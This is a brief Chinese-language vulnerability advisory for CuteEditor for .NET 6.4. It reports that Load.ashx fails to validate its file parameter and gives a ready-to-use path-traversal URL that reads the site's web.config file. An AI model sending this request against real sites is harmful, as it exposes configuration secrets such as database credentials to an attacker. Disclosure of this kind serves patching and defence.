From:kindle
影响版本:
CuteEditor For Net 6.4
程序介绍:
CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。
漏洞分析:
在 Load.ashx 文件中未对file参数进行处理,可以加载任意文件。
漏洞利用:
http://www.xxxxx.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
本文还暂无回复